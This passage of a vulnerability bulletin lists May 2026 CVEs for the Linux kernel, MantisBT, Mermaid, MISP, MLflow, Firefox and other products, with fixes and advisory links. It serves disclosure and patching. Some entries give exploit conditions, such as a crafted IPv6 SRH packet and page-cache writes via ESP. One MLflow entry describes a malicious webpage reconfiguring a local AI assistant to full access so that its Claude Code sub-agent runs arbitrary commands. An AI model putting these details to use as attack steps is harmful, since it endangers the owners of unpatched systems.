78.671936][ T363] ? __pfx_qfq_dequeue+0x10/0x10 [sch_qfq] [ 78.672148][ T363] ? __pfx__printk+0x10/0x10 [ 78.672322][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672496][ T363] ? lockdep_hardirqs_on_prepare+0xa8/0x1a0 [ 78.672706][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.672875][ T363] ? trace_hardirqs_on+0x19/0x1a0 [ 78.673047][ T363] red_dequeue+0x65/0x270 [sch_red] [ 78.673217][ T363] ? srso_alias_return_thunk+0x5/0xfbef5 [ 78.673385][ T363] tbf_dequeue.cold+0xb0/0x70c [sch_tbf] [ 78.673566][ T363] __qdisc_run+0x169/0x1900 The right thing to do in #1b is to grab the skb off gso_skb queue. This patchset fixes that issue by changing #1b to use qdisc_dequeue_peeked() method instead. | 2026-05-21 | not yet calculated | CVE-2026-43496 | https://git.kernel.org/stable/c/36aa34f42cb6842cf371f3a2d3e855d24fd57a50 https://git.kernel.org/stable/c/ce051eede433f876d322ac3550a36a3c6fc4c231 https://git.kernel.org/stable/c/8d09618840b99ef00154d3e731ce9b11e096196d https://git.kernel.org/stable/c/587dcf970a525f543d8b5855d9f37a4ca97b76ef https://git.kernel.org/stable/c/458d5615272d3de535748342eb68ca492343048c |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: fbdev: udlfb: add vm_ops to dlfb_ops_mmap to prevent use-after-free dlfb_ops_mmap() uses remap_pfn_range() to map vmalloc framebuffer pages to userspace but sets no vm_ops on the VMA. This means the kernel cannot track active mmaps. When dlfb_realloc_framebuffer() replaces the backing buffer via FBIOPUT_VSCREENINFO, existing mmap PTEs are not invalidated. On USB disconnect, dlfb_ops_destroy() calls vfree() on the old pages while userspace PTEs still reference them, resulting in a use-after-free: the process retains read/write access to freed kernel pages. Add vm_operations_struct with open/close callbacks that maintain an atomic mmap_count on struct dlfb_data. In dlfb_realloc_framebuffer(), check mmap_count and return -EBUSY if the buffer is currently mapped, preventing buffer replacement while userspace holds stale PTEs. Tested with PoC using dummy_hcd + raw_gadget USB device emulation. | 2026-05-21 | not yet calculated | CVE-2026-43497 | https://git.kernel.org/stable/c/4f312c30f0368e8d2a76aa650dff73f23490b5e7 https://git.kernel.org/stable/c/18dd358de72d57993422cbb5dfb29ccd74efe192 https://git.kernel.org/stable/c/da9b065cedfd3b574f229d5be594e6aa47a27ae6 https://git.kernel.org/stable/c/a2c53a3822ee26e8d758071815b9ed3bf6669fc1 https://git.kernel.org/stable/c/8de779dc40d35d39fa07387b6f921eb11df0f511 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: accel/ivpu: Disallow re-exporting imported GEM objects Prevent re-exporting of imported GEM buffers by adding a custom prime_handle_to_fd callback that checks if the object is imported and returns -EOPNOTSUPP if so. Re-exporting imported GEM buffers causes loss of buffer flags settings, leading to incorrect device access and data corruption. | 2026-05-21 | not yet calculated | CVE-2026-43498 | https://git.kernel.org/stable/c/3756043dd695bba34cc728cdc5688dcb49ac8043 https://git.kernel.org/stable/c/7dd57d7a6350770dfc283287125c409e995200e0 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: rtmutex: Use waiter::task instead of current in remove_waiter() remove_waiter() is used by the slowlock paths, but it is also used for proxy-lock rollback in rt_mutex_start_proxy_lock() when invoked from futex_requeue(). In the latter case waiter::task is not current, but remove_waiter() operates on current for the dequeue operation. That results in several problems: 1) the rbtree dequeue happens without waiter::task::pi_lock being held 2) the waiter task’s pi_blocked_on state is not cleared, which leaves a dangling pointer primed for UAF around. 3) rt_mutex_adjust_prio_chain() operates on the wrong top priority waiter task Use waiter::task instead of current in all related operations in remove_waiter() to cure those problems. [ tglx: Fixup rt_mutex_adjust_prio_chain(), add a comment and amend the changelog ] | 2026-05-21 | not yet calculated | CVE-2026-43499 | https://git.kernel.org/stable/c/8a1fc8d698ac5e5916e3082a0f74450d71f9611f https://git.kernel.org/stable/c/6d52dfcb2a5db86e346cf51f8fcf2071b8085166 https://git.kernel.org/stable/c/3fb7394a837740770f0d6b4b30567e60786a63f2 https://git.kernel.org/stable/c/88614876370aac8ad1050ad785a4c095ba17ac11 https://git.kernel.org/stable/c/3bfdc63936dd4773109b7b8c280c0f3b5ae7d349 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: rpl: reserve mac_len headroom when recompressed SRH grows ipv6_rpl_srh_rcv() decompresses an RFC 6554 Source Routing Header, swaps the next segment into ipv6_hdr->daddr, recompresses, then pulls the old header and pushes the new one plus the IPv6 header back. The recompressed header can be larger than the received one when the swap reduces the common-prefix length the segments share with daddr (CmprI=0, CmprE>0, seg[0][0] != daddr[0] gives the maximum +8 bytes). pskb_expand_head() was gated on segments_left == 0, so on earlier segments the push consumed unchecked headroom. Once skb_push() leaves fewer than skb->mac_len bytes in front of data, skb_mac_header_rebuild()’s call to: skb_set_mac_header(skb, -skb->mac_len); will store (data – head) – mac_len into the u16 mac_header field, which wraps to ~65530, and the following memmove() writes mac_len bytes ~64KiB past skb->head. A single AF_INET6/SOCK_RAW/IPV6_HDRINCL packet over lo with a two segment type-3 SRH (CmprI=0, CmprE=15) reaches headroom 8 after one pass; KASAN reports a 14-byte OOB write in ipv6_rthdr_rcv. Fix this by expanding the head whenever the remaining room is less than the push size plus mac_len, and request that much extra so the rebuilt MAC header fits afterwards. | 2026-05-21 | not yet calculated | CVE-2026-43501 | https://git.kernel.org/stable/c/8e8be63465a5e80394c70324603dfea1bfdad48f https://git.kernel.org/stable/c/4babc2d9fda2df43823b85d08a0180b68f1b0854 https://git.kernel.org/stable/c/c261d07a80576dc8ccf394ef8f074f8c67a06b37 https://git.kernel.org/stable/c/7398ebefbfd4f8a31d4f665a4213302fa995494b https://git.kernel.org/stable/c/9e6bf146b55999a095bb14f73a843942456d1adc |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: handle zerocopy send cleanup before the message is queued A zerocopy send can fail after user pages have been pinned but before the message is attached to the sending socket. The purge path currently infers zerocopy state from rm->m_rs, so an unqueued message can be cleaned up as if it owned normal payload pages. However, zerocopy ownership is really determined by the presence of op_mmp_znotifier, regardless of whether the message has reached the socket queue. Capture op_mmp_znotifier up front in rds_message_purge() and use it as the cleanup discriminator. If the message is already associated with a socket, keep the existing completion path. Otherwise, drop the pinned page accounting directly and release the notifier before putting the payload pages. This keeps early send failure cleanup consistent with the zerocopy lifetime rules without changing the normal queued completion path. | 2026-05-21 | not yet calculated | CVE-2026-43502 | https://git.kernel.org/stable/c/21d70744e6d3bbf9293aa1ee6fba7c53ad75275e https://git.kernel.org/stable/c/3abc8983b2bae3f487f77d9da5527d7d6b210d46 https://git.kernel.org/stable/c/14ef6fd18db2494098b21e0471bf27a1d8e9993e https://git.kernel.org/stable/c/0f5c185fc79a59ee9991234dd6d2a3e5afa6e75b https://git.kernel.org/stable/c/44b550d88b267320459d518c0743a241ab2108fa |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net: skbuff: propagate shared-frag marker through frag-transfer helpers Two frag-transfer helpers (__pskb_copy_fclone() and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in skb_shinfo()->flags when moving frags from source to destination. __pskb_copy_fclone() defers the rest of the shinfo metadata to skb_copy_header() after copying frag descriptors, but that helper only carries over gso_{size,segs, type} and never touches skb_shinfo()->flags; skb_shift() moves frag descriptors directly and leaves flags untouched. As a result, the destination skb keeps a reference to the same externally-owned or page-cache-backed pages while reporting skb_has_shared_frag() as false. The mismatch is harmful in any in-place writer that uses skb_has_shared_frag() to decide whether shared pages must be detoured through skb_cow_data(). ESP input is one such writer (esp4.c, esp6.c), and a single nft ‘dup to <local>’ rule — or any other nf_dup_ipv4() / xt_TEE caller — is enough to land a pskb_copy()’d skb in esp_input() with the marker stripped, letting an unprivileged user write into the page cache of a root-owned read-only file via authencesn-ESN stray writes. Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors were actually moved from the source. skb_copy() and skb_copy_expand() share skb_copy_header() too but linearize all paged data into freshly allocated head storage and emerge with nr_frags == 0, so skb_has_shared_frag() returns false on its own; they need no change. The same omission exists in skb_gro_receive() and skb_gro_receive_list(). The former moves the incoming skb’s frag descriptors into the accumulator’s last sub-skb via two paths (a direct frag-move loop and the head_frag + memcpy path); the latter chains the incoming skb whole onto p’s frag_list. Downstream skb_segment() reads only skb_shinfo(p)->flags, and skb_segment_list() reuses each sub-skb’s shinfo as the nskb — both p and lp must carry the marker. The same omission also exists in tcp_clone_payload(), which builds an MTU probe skb by moving frag descriptors from skbs on sk_write_queue into a freshly allocated nskb. The helper falls into the same family and warrants the same fix for consistency; no TCP TX-side in-place writer is currently known to reach a user page through this gap, but a future consumer depending on the marker would regress silently. The same omission exists in skb_segment(): the per-iteration flag merge takes only head_skb’s flag, and the inner switch that rebinds frag_skb to list_skb on head_skb-frags exhaustion does not fold the new frag_skb’s flag into nskb. Fold frag_skb’s flag at both sites so segments drawing frags from frag_list members carry the marker. | 2026-05-23 | not yet calculated | CVE-2026-43503 | https://git.kernel.org/stable/c/fbeab9555564a1b98e8582cd106dfe46c4606991 https://git.kernel.org/stable/c/179f1852bdedc300e373e807cc102cd81feff196 https://git.kernel.org/stable/c/12401fcfb01f53ccc63ab0a3246570fe8f3105ee https://git.kernel.org/stable/c/989214c66884d70716d83dc1d0bf5e16287bf349 https://git.kernel.org/stable/c/fc6eb39c55e97df2f94ad974b8a5bbcd019da2c8 https://git.kernel.org/stable/c/ff375cc75f9167168db38e0464a482d5fbc8d81d https://git.kernel.org/stable/c/9bc9d6d6967a2239aa57af2aa53554eddd640d20 https://git.kernel.org/stable/c/48f6a5356a33dd78e7144ae1faef95ffc990aae0 |
| Linux–Linux | In the Linux kernel, the following vulnerability has been resolved: net: skbuff: preserve shared-frag marker during coalescing skb_try_coalesce() can attach paged frags from @from to @to. If @from has SKBFL_SHARED_FRAG set, the resulting @to skb can contain the same externally-owned or page-cache-backed frags, but the shared-frag marker is currently lost. That breaks the invariant relied on by later in-place writers. In particular, ESP input checks skb_has_shared_frag() before deciding whether an uncloned nonlinear skb can skip skb_cow_data(). If TCP receive coalescing has moved shared frags into an unmarked skb, ESP can see skb_has_shared_frag() as false and decrypt in place over page-cache backed frags. Propagate SKBFL_SHARED_FRAG when skb_try_coalesce() transfers paged frags. The tailroom copy path does not need the marker because it copies bytes into @to’s linear data rather than transferring frag descriptors. | 2026-05-23 | not yet calculated | CVE-2026-46300 | https://git.kernel.org/stable/c/3599e6b3cc1ada96883d496a50a210d3afbb6987 https://git.kernel.org/stable/c/2f2b16022a2e10ca7bccfb98db5ed2ec0f72641c https://git.kernel.org/stable/c/9d3e5fd19fe1063bf607219e8562fbd567b8e8d5 https://git.kernel.org/stable/c/78bf6b6bb19541d19fbda6242e7cfe2c682763c0 https://git.kernel.org/stable/c/760e1addc27ba1a7beb4a0a7e8b3e9ec49e7a34e https://git.kernel.org/stable/c/3bd9e113d50034db99d7ef69fd8e5242d15e414a https://git.kernel.org/stable/c/3884358a9286b17f389a72b1426fc4547c23c111 https://git.kernel.org/stable/c/f84eca5817390257cef78013d0112481c503b4a3 |
| LiteSpeed Technologies–cPanel Plugin | LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation (possibly to root), as exploited in the wild in May 2026. Detection is best done via a command line of grep -rE “cpanel_jsonapi_func=redisAble” /var/cpanel/logs /usr/local/cpanel/logs/ 2>/dev/null in Bash. If you get no output, you have not been hit with exploitation of the vulnerability. If there is output, we recommend you examine the IP addresses in the list, determine if they are valid IP addresses, and if not, block them. To determine damage done, examine the system logs for use by the detected IP addresses. The issue is related to mishandling of Redis enable/disable features. The recommended minimum version is 2.4.7. | 2026-05-21 | not yet calculated | CVE-2026-48172 | https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/cpanel https://www.litespeedtech.com/products/litespeed-web-server/control-panel-support/release-log https://blog.litespeedtech.com/2026/05/21/security-update-for-litespeed-cpanel-plugin/ |
| lostisland–faraday | Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Versions 2.0.0 through 2.14.1 still allow protocol-relative host override when the request target is passed as a URI object (rather than a String) to Faraday::Connection#build_exclusive_url. This bypasses the February 2026 fix for GHSA-33mh-2634-fwr2 and enables off-host request forgery: a request built from a fixed-base Faraday::Connection can be redirected to an attacker-controlled host, forwarding connection-scoped values such as Authorization headers and default query parameters. This issue has been fixed in version 2.14.3. | 2026-05-19 | not yet calculated | CVE-2026-33637 | https://github.com/lostisland/faraday/security/advisories/GHSA-5rv5-xj5j-3484 https://github.com/advisories/GHSA-33mh-2634-fwr2 |
| LXQt–PCManFM-Qt | An issue was discovered in all versions of PCManFM-Qt starting from 1.1.0. When a regular file’s path is passed as a URI in an org.freedesktop.FileManager1.ShowFolders D-Bus method call, PCManFM-Qt delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution or circumvent network namespace restrictions. NOTE: those outcomes are potentially unwanted by most users; however, the behavior of the product does comply with the applicable specification, and a simplistic solution (ensuring that the URI does not name a regular file) may have adverse consequences for I/O. | 2026-05-22 | not yet calculated | CVE-2026-48700 | https://www.openwall.com/lists/oss-security/2026/05/20/2 https://www.openwall.com/lists/oss-security/2026/05/19/1 https://github.com/lxqt/pcmanfm-qt/releases |
| M-Files Corporation–M-Files Server | Denial-of-service condition in M-Files Server versions before 26.5.16015.0, before 26.2 LTS, and before 25.8 LTS SR3 allows an authenticated user to cause the MFserver process to crash | 2026-05-18 | not yet calculated | CVE-2026-0983 | https://empower.m-files.com/security-advisories/CVE-2026-0983 |
| mailcow–mailcow-dockerized | mailcow-dockerized contains a stored cross-site scripting vulnerability in the administrator Queue Manager. The Queue Manager fetches mail queue entries from /api/v1/get/mailq/all, copies server-controlled Postfix queue fields into DataTables rows, and renders several of those fields as HTML without adequate output encoding. This issue affects mailcow-dockerized: 2026-03b. | 2026-05-20 | not yet calculated | CVE-2026-7460 | https://fluidattacks.com/advisories/mojabi https://github.com/mailcow/mailcow-dockerized |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.0 and 2.28.1 allow a low-privileged authenticated user assigned the “add_profile_threshold” permission to create a global profile despite not having manage_global_profile_threshold, by tampering with the user_id parameter in a valid profile creation request. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-33052 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-68w5-w573-q2r8 https://github.com/mantisbt/mantisbt/commit/3f952e68fa864e0e60abc3e84adecf3cfa84c75e https://mantisbt.org/bugs/view.php?id=36974 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior have a Privilege Escalation vulnerability where insufficient access control checks in ProjectUsersAddCommand (manage_proj_user_add.php) allow users having manage_project_threshold access level (manager by default) to grant project-level administrator access to any user (including themselves) in any Project they have manager rights in. The normal project-user add form restricts the selectable access levels to the actor’s own project role or below. However, the backend handler still accepts a forged higher access_level value and writes it. The consequences of the privilege escalation are slight, as having administrator access at Project level is effectively not very different from being manager, and it does not actually give administrator privileges on the whole MantisBT instance. In particular, it does not let the upgraded user delete the Project or grant them any access to global administrative functions such as managing Users, Projects, Plugins, Custom Fields, etc. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34390 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-frf7-jhp9-jxm6 https://github.com/mantisbt/mantisbt/commit/69e0180f180ed5acf48a8d281a73683a7bf32461 https://mantisbt.org/bugs/view.php?id=36995 https://mantisbt.org/bugs/view.php?id=37002 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior contain a Stored XSS vulnerability. When cloning an issue originating from a Project other than the current one, the clone form (bug_report_page.php) prepends the source Project name before the category selector without proper escaping, allowing an attacker able to to inject HTML if they can set the Project’s name (which typically requires manager or administrator access level). This issue has been resolved in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34463 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-fvjf-68wh-rwp2 https://github.com/mantisbt/mantisbt/commit/df22697ae497ddd93f3d9132fdf4979db8d081cd https://mantisbt.org/bugs/view.php?id=36986 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior are vulnerable to Authorization Bypass through the private issue monitoring feature . Using a crafted POST request to bug_monitor_add.php, a user with project-level access can add themselves as a monitor for a private issue they do not have access to. Despite displaying an Access Denied error, the application accepts the request and creates a monitor relationship for the private issue. Direct access to the private issue remains blocked, but the user will receive email notifications for updates, leading to disclosure of the private issue’s metadata and content. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34579 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-ggw7-9675-6v4v https://github.com/mantisbt/mantisbt/commit/0a93267deba445fb9d15250c16e6fdb1246ffa65 https://mantisbt.org/bugs/view.php?id=36975 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior permit a user to list and download their own attachments from an Issue created by another user even after it becomes private, bypassing read access revocation. The loss of confidentiality caused by this vulnerability is minimal, considering that only attachments previously uploaded by the user themselves remain accessible. This issue has been fixed in version 2.82.2. | 2026-05-19 | not yet calculated | CVE-2026-34744 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-rmp5-5jj7-gmvf https://github.com/mantisbt/mantisbt/commit/de7bdeec36de066235e38a77bf056917d951c84d https://mantisbt.org/bugs/view.php?id=36977 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.28.1 and prior allow a bugnote author to access the note’s Revisions page after losing access to the parent private issue. This issue has been fixed in version 2.28.2. | 2026-05-19 | not yet calculated | CVE-2026-34970 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-crmx-4p49-46m2 https://github.com/mantisbt/mantisbt/commit/71df1f67e05b2050cd4bd87839e6cc13747cf03f https://mantisbt.org/bugs/view.php?id=36978 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. Versions 2.11.0 through 2.28.1 allow any authenticated user to inject arbitrary HTML by updating their account’s font family. Upon exploitation, an XSS payload would be reflected on every MantisBT page. Leveraging another vulnerability (CSP bypass, see GHSA-9c3j-xm6v-j7j3), the attacker could achieve account takeover. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40596 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-j3v9-553h-x28j https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/9e8409cdd979eba86ef532756fc47c1d8112d22d https://mantisbt.org/bugs/view.php?id=37011 https://mantisbt.org/bugs/view.php?id=37016 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, given any pre-existing XSS / HTML injection vulnerability, an attacker can bypass the Content Security Policy’s script-src directive by uploading a crafted attachment to any issue that, when accessed via the file_download.php link, will be downloaded with a valid JavaScript MIME type resulting in script execution. The uploaded payload must be sniffed as a valid JavaScript MIME type by PHP finfo (see file_create_finfo() API function). Non-JavaScript MIME types will not get imported in a <script> tag by the browser, due to response header X-Content-Type-Options being set to nosniff, which requires all imported JavaScript files to be a valid JavaScript MIME type. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40597 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-9c3j-xm6v-j7j3 https://github.com/mantisbt/mantisbt/commit/9e3bee2e7b909f4e3596985892b8bc8bee9e0bfe https://mantisbt.org/bugs/view.php?id=37016 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.28.1 and below, improper escaping of the redirection page (retrieved from the request’s Referer header) allows an attacker to inject HTML. While this is generally not directly actionable as modern browsers will URL-encode special characters, on some specific server configurations this could poison the cache, leading to cross-site scripting. This issue has been fixed in version 2.28.2. | 2026-05-22 | not yet calculated | CVE-2026-40598 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-6jh4-47v2-4g37 https://github.com/mantisbt/mantisbt/commit/b1ebc57763f104eb5f541b7b4d1ce6948168abd9 https://mantisbt.org/bugs/view.php?id=37017 |
| mantisbt–mantisbt | Mantis Bug Tracker (MantisBT) is an open source issue tracker. In versions 2.11.0 through 2.28.1, a Stored XSS vulnerability is caused by incorrect escaping of a saved filter’s owner, allowing an attacker to inject arbitrary HTML on systems where $g_show_user_realname = ON. Note that By default, only users with Manager access level or above can save their filters publicly. This issue has been fixed in version 2.28.2. If developers are unable to update immediately, they can work around this issue by preventing display of users’ real names (set $g_ show_user_realname = OFF; in configuration), and restricting the ability to store filters (set $g_stored_query_create_threshold / $g_stored_query_create_shared_threshold to NOBODY). | 2026-05-22 | not yet calculated | CVE-2026-40607 | https://github.com/mantisbt/mantisbt/security/advisories/GHSA-f633-865q-2mhh https://github.com/mantisbt/mantisbt/commit/44f490bcf20fd491c1b8f3fc9dd041d8c2a30010 https://mantisbt.org/bugs/view.php?id=37015 |
| mermaid-js–mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and prior, in addition to 11.0.0-alpha.1 through 11.12.0 are vulnerable to CSS injection through improper sanitization. The state diagram (and any other diagram type that routes user-controlled style strings through the createCssStyles parser) captures classDef values using an unrestricted regex that matches everything up to a newline. That value then flows unsanitized through addStyleClass() into createCssStyles() and is assigned to style.innerHTML, so a closing brace (}) in the value terminates the generated CSS selector and turns everything after it into a new CSS rule on the page. This enables page defacement, user tracking via url() callbacks, and DOM attribute exfiltration. This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting “securityLevel”: “sandbox”, which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. | 2026-05-22 | not yet calculated | CVE-2026-41148 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102 https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 https://mermaid.js.org/config/schema-docs/config.html#securitylevel |
| mermaid-js–mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and earlier, as well as 11.0.0-alpha.1 through 11.14.0, are vulnerable to HTML injection under the default configuration. Specifically, the classDef directive in Mermaid state diagrams permits DOM injection that escapes the SVG context. However, <script> tags are stripped, which prevents cross-site scripting (XSS). This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting “securityLevel”: “sandbox”, which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. | 2026-05-22 | not yet calculated | CVE-2026-41149 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056 https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3 |
| misp–misp | MISP’s OIDC authentication plugin allowed automatic linking of an OIDC identity to an existing local user account based on the email claim when the local account had no stored sub value. Under insecure or untrusted IdP configurations where email ownership is not enforced, an attacker with a valid OIDC token could assert a victim’s email address and authenticate as that user, leading to account takeover. | 2026-05-20 | not yet calculated | CVE-2026-9084 | https://github.com/MISP/MISP/commit/71f5662c1b5886613d2cd5c72fd93bb4ca6fa172 |
| misp–misp | A vulnerability was identified in the ShadowAttribute proposal creation workflow. The add action accepted user-controlled ShadowAttribute request data without removing the id field before saving the record. Because the underlying framework treats a supplied primary key as an instruction to update an existing record, an authenticated user able to submit shadow attribute proposals could provide the identifier of an existing ShadowAttribute and cause that record to be updated instead of creating a new proposal. This can result in unauthorized modification of existing shadow attributes, potentially affecting proposals associated with events the user should not be able to alter. Depending on deployment configuration and accessible API responses, the issue may also expose or move proposal data across event contexts. The vulnerability is caused by trusting a client-supplied primary key during object creation. The fix removes the id field from incoming ShadowAttribute data before processing, ensuring that the endpoint always creates a new proposal rather than updating an existing one. This has been fixed in MISP 2.5.38. | 2026-05-20 | not yet calculated | CVE-2026-9136 | https://github.com/MISP/MISP/commit/49911b1d4b6e4517d803e50e3d980aaa4d37c16d |
| misp–misp | The CSP report endpoint intended to limit logged CSP reports to 1 KB but incorrectly allowed reports up to 1 MB before truncation. On deployments where the endpoint is reachable by untrusted clients, this could allow attackers to generate excessive log volume and contribute to resource exhaustion or log flooding. | 2026-05-20 | not yet calculated | CVE-2026-9137 | https://github.com/MISP/MISP/commit/02932cccab230b295afcaf5aa05e363d30db0ec9 |
| mlflow–mlflow/mlflow | In MLflow version 3.9.0, the MLflow Assistant feature introduced improper origin validation in its /ajax-api endpoints. This vulnerability allows a remote attacker to exploit cross-origin requests from a malicious webpage to interact with the MLflow Assistant running on a victim’s local machine. By bypassing the loopback-only restriction, the attacker can modify the Assistant’s configuration to enable full access, which in turn allows the execution of arbitrary commands via the Claude Code sub-agent. This issue is resolved in version 3.10.0. | 2026-05-19 | not yet calculated | CVE-2026-2611 | https://huntr.com/bounties/8462addd-b464-4a84-b6a2-5529604e6e5a https://github.com/mlflow/mlflow/commit/8f9c8a53af90842944101eb8b7d60706822c81bc |
| mlflow–mlflow/mlflow | In mlflow/mlflow versions up to 3.9.0, the `SearchModelVersions` REST API endpoint and the `mlflowSearchModelVersions` GraphQL query lack proper per-model authorization checks when basic authentication is enabled. This allows any authenticated user to enumerate all model versions across all registered models, regardless of their permission level. The issue arises due to the absence of `SearchModelVersions` in the `BEFORE_REQUEST_VALIDATORS` and `AFTER_REQUEST_HANDLERS` for the REST API, and its omission from `GraphQLAuthorizationMiddleware.PROTECTED_FIELDS` for GraphQL. This vulnerability can expose sensitive information such as model names, version descriptions, source URIs, tags, and other metadata, potentially revealing proprietary or confidential details in multi-tenant environments. The issue is resolved in version 3.10.0. | 2026-05-21 | not yet calculated | CVE-2026-2734 | https://huntr.com/bounties/d632f783-b2c7-4a3b-af5e-1d693e841c08 https://github.com/mlflow/mlflow/commit/6989066af33fdcb03588fd71a1a67f8fc5ef12c9 |
| mlflow–mlflow/mlflow | In mlflow/mlflow versions prior to 3.11.0, the `get_or_create_nfs_tmp_dir()` function in `mlflow/utils/file_utils.py` creates temporary directories with world-writable permissions (0o777), and the `_create_model_downloading_tmp_dir()` function in `mlflow/pyfunc/__init__.py` creates directories with group-writable permissions (0o770). These insecure permissions allow local attackers to tamper with model artifacts, such as cloudpickle-serialized Python objects, and achieve arbitrary code execution when the tampered artifacts are deserialized via `cloudpickle.load()`. This vulnerability is particularly critical in environments with shared NFS mounts, such as Databricks, where NFS is enabled by default. The issue is a continuation of the vulnerability class addressed in CVE-2025-10279, which was only partially fixed. | 2026-05-18 | not yet calculated | CVE-2026-4137 | https://huntr.com/bounties/648dc30b-76c7-4433-86b8-f43d926fd8d6 https://github.com/mlflow/mlflow/commit/1dcbb0c2fbd1f446c328830e601ca13a28219b8a |
| ModelScope–ModelScope 1.25.0 | An issue was discovered in ModelScope 1.25.0 allowing attackers to execute arbitrary code via crafted module listed in the configuration file (dey_mini.yaml) under the key [‘nnet’][‘module’]. | 2026-05-19 | not yet calculated | CVE-2025-51427 | https://github.com/modelscope/modelscope/issues/1331 https://github.com/modelscope/modelscope/pull/1333 https://github.com/JIRUWOZHI/vulnerability-disclosure/blob/main/CVE-2025-51427/CVE_2025_51427.md |
| Mozilla–Firefox | Sandbox escape in Firefox and Firefox Focus for Android. This vulnerability was fixed in Firefox 151. | 2026-05-19 | not yet calculated | CVE-2026-8945 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003171 https://www.mozilla.org/security/advisories/mfsa2026-46/ |
| Mozilla–Firefox | Incorrect boundary conditions in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8946 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029070 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Use-after-free in the DOM: Bindings (WebIDL) component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8947 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038439 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8948 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038803 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
